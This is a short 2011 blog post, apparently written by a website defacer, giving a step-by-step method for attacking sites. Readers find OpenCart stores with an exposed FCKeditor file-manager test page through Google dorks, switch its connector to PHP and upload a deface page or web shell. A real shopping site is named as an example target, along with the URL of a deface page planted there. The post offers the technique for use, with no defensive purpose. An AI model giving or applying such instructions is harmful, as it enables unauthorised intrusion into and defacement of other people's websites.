Saturday, October 8, 2011

This is Very Easy Technique Of Exploiting A Wordpress Website by Uploading A Deface Page Or Shell..!!!

                              





SO here is the Procedure how you Do it:


1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    or
    inurl:Powered By OpenCart


    http://www.schoolshopper.com.au/
    You'll Got a lot of websites by google, select anyone .
    you must have to search a lot to find good fresh vulnerable websites.:P
     For Example i got this one 
    Then i'll will simply add the vuln URL after the website 

    http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    Example


    (The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

    Now a Page will be open Like This 


    Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)















    and Now see file upload option and upload your deface or shell
    http://www.schoolshopper.com.au/Cyb3r_dev(1).htm

    and for checking shell or deface check this url 
      www.site.com/deface.html
      or
      www.site.com/shell.php


    0 comments:

    Post a Comment